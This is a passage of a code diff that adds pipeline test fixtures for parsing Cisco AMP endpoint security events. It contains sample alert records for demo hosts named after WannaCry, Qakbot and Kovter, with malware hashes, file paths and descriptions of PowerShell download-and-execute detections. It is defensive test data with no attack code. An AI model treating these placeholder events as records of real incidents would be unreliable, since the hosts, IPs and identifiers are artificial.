IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json
new file mode 100644
index 00000000000..83afe6a0131
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json
@@ -0,0 +1,3968 @@ +{ + "expected": [ + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.853984379Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": 
"6419204901661835000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419204897366867970", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.853988673Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419204901661835000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Ransom:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419204901661835279", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + 
"related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.853990700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat 
Detected", + "id": "6419204901661835000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419204901661835278", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.853992661Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419204901661835000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + 
"connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419204901661835276", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.853994603Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419204901661835000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419204897366867979", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + 
"related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.853996517Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419204901661835000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": 
"Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419204897366867971", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T12:57:46.000Z", + "file": { + "hash": { + "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.853998395Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6411462922463085000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6411462918168117251", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T12:57:46.000Z", + "file": { + "hash": { + "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854000301Z", + "original": 
